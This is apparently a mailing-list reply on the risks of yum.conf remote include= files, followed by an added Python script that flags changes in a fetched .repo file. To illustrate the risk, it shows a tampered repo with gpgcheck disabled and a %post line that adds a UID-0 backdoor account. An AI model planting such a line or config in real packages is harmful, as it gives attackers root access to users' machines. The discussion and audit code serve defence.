> First, includes are recursive. e.g. yum.conf may include a file that
> includes a file that includes a file ad infinitum. And, it is possible
> to include either local files or remote (http/ftp) files. The problem
> here is that it is (currently) possible for a remote file to include any
> other file. When the remote file is managed by the user this isn't a big
> deal but if repositories started providing files for users to include
> in their yum.conf's, this could lead to security concerns in that the
> remote file can basically set arbitrary values in yum.conf (adding other
> repositories behind the scenes, etc). Or, if a remote file is
> compromised, it could point to some other repository URL without the
> user knowing, which may allow a malicious someone to update almost
> anything (in the absence of gpg).

The first person who suggests gpg signing config files gets beaten. :)

My general take is that this is no big deal - but there is the possibility for much abuse and much flexibility. Hard call between the two of them.

from a standpoint of flexibility being able to get parts of your config file from an arbitrary url is useful and handy - on the other hand think of this config file:

[main]
include=http://domain.org/mymain.cgi
include=http://freshrpms.net/default-repo
include=http://fedora.us/default.repo
include=http://joeblows/default.repo

now fedora and freshrpms are trustworthy folks - but joeblow might not be or none of their security might be good enough and the default.repo for joeblows might normally be:

[joeblows]
name = joe blow's rpms - the best rpms money can buy
baseurl=http://joeblows/rpms/
gpgcheck=1

it could become:

[joeblows]
name = joe blow's rpms - the best rpms money can buy
baseurl=http://someotherplacew/evil/rpms/
gpgcheck=0

the results could be - that someotherplace has taken all of joeblows rpms and rebuilt them with:

%post
/usr/sbin/adduser -r -u 0 -p somepass r00t

Clearly anyone can see the implications of that.

include= could give a lot of flexibility in a controlled environment, or it could allow more boxes to be rooted quickly :)

I just wanted to add a precise example to ryan's comment.

-sv
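
Added example, not part of the original message and not yum code: a check an administrator could run on a remotely included .repo file, comparing the freshly fetched copy against the last copy they reviewed and reporting the changes the message describes (gpgcheck turned off, baseurl moved to another host, a nested include). The function names, the idea of keeping a reviewed copy, and treating only gpgcheck=1 as enabled are assumptions of this example; the sample input is constructed from the two default.repo versions above.

```python
import configparser
from urllib.parse import urlparse

# Constructed sample input: the two versions of default.repo from the message.
REVIEWED = """\
[joeblows]
name = joe blow's rpms - the best rpms money can buy
baseurl=http://joeblows/rpms/
gpgcheck=1
"""
FETCHED = """\
[joeblows]
name = joe blow's rpms - the best rpms money can buy
baseurl=http://someotherplacew/evil/rpms/
gpgcheck=0
"""

def parse(text):
    # strict=False tolerates repeated keys such as several include= lines.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return {s: dict(cp[s]) for s in cp.sections()}

def hosts(opts):
    # baseurl may list several URLs separated by whitespace.
    return {urlparse(u).hostname for u in opts.get("baseurl", "").split()}

def audit_include(reviewed_text, fetched_text):
    """Return (section, issue) pairs for a fetched include vs. the reviewed copy."""
    old, new = parse(reviewed_text), parse(fetched_text)
    findings = []
    for section, opts in new.items():
        before = old.get(section)
        if before is None:
            findings.append((section, "section-added"))
            before = {}
        if "include" in opts:
            findings.append((section, "nested-include"))
        # Assumption of this example: only gpgcheck=1 counts as enabled.
        if opts.get("gpgcheck") != "1":
            findings.append((section, "gpgcheck-off"))
        if before and hosts(opts) - hosts(before):
            findings.append((section, "baseurl-host-changed"))
    return findings

if __name__ == "__main__":
    for section, issue in audit_include(REVIEWED, FETCHED):
        print(f"[{section}] {issue}")
```

Any finding means the fetched file should not replace the reviewed copy until someone has looked at it.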